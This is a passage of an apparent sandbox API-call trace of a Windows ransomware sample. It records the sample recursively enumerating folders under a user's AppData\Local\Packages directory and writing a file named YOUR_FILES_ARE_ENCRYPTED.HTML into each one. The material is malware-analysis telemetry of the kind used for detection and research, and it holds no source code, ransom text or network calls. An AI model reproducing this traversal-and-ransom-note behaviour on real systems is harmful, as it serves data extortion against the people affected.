lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x698498*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.459] CloseHandle (hObject=0x338) returned 1 [0119.459] GetProcessHeap () returned 0x600000 [0119.459] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.459] GetProcessHeap () returned 0x600000 [0119.459] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.459] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd1f071, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd1f071, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0119.459] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.459] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData") returned 111 [0119.459] GetProcessHeap () returned 0x600000 [0119.459] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.459] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData" [0119.459] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\*" [0119.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd1f071, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd1f071, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0119.460] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd1f071, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd1f071, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 1 [0119.460] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bd1f071, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd1f071, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 0 [0119.460] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0119.460] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0119.460] GetProcessHeap () returned 0x600000 [0119.460] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x698498 [0119.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.461] WriteFile (in: hFile=0x338, lpBuffer=0x698498*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x698498*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.462] CloseHandle (hObject=0x338) returned 1 [0119.462] GetProcessHeap () returned 0x600000 [0119.462] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.462] GetProcessHeap () returned 0x600000 [0119.462] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.462] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0119.462] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.462] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState") returned 107 [0119.462] GetProcessHeap () returned 0x600000 [0119.462] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.462] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState" [0119.462] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\*" [0119.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.463] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 1 [0119.463] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 0 [0119.463] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.463] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0119.463] GetProcessHeap () returned 0x600000 [0119.463] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x698498 [0119.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.464] WriteFile (in: hFile=0x338, lpBuffer=0x698498*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x698498*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.465] CloseHandle (hObject=0x338) returned 1 [0119.465] GetProcessHeap () returned 0x600000 [0119.465] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.465] GetProcessHeap () returned 0x600000 [0119.465] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.465] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0119.465] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.465] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0119.465] GetProcessHeap () returned 0x600000 [0119.465] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0119.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.466] WriteFile (in: hFile=0x31c, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0119.467] CloseHandle (hObject=0x31c) returned 1 [0119.467] GetProcessHeap () returned 0x600000 [0119.467] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.467] GetProcessHeap () returned 0x600000 [0119.468] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0119.479] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a85f54c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Windows.Photos_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.PHO")) returned 1 [0119.479] StrStrIW (lpFirst="Microsoft.Windows.Photos_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.479] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe") returned 87 [0119.479] GetProcessHeap () returned 0x600000 [0119.479] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0119.480] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe" [0119.480] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\*" [0119.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a85f54c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1c2a8e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1c2a8e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0119.481] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a85f54c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1c2a8e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1c2a8e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0119.481] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0119.481] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.481] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC") returned 90 [0119.481] GetProcessHeap () returned 0x600000 [0119.481] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.481] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC" [0119.481] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\*" [0119.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.483] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 1 [0119.483] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0119.483] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.483] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache") returned 100 [0119.483] GetProcessHeap () returned 0x600000 [0119.483] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.484] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache" [0119.484] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\*" [0119.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.484] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName="..", cAlternateFileName="")) returned 1 [0119.485] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d1c0, cFileName="..", cAlternateFileName="")) returned 0 [0119.485] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.485] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0119.485] GetProcessHeap () returned 0x600000 [0119.485] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.486] WriteFile (in: hFile=0x338, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.487] CloseHandle (hObject=0x338) returned 1 [0119.487] GetProcessHeap () returned 0x600000 [0119.487] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.487] GetProcessHeap () returned 0x600000 [0119.487] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.488] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a91e2d1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a91e2d1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a91e2d1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, 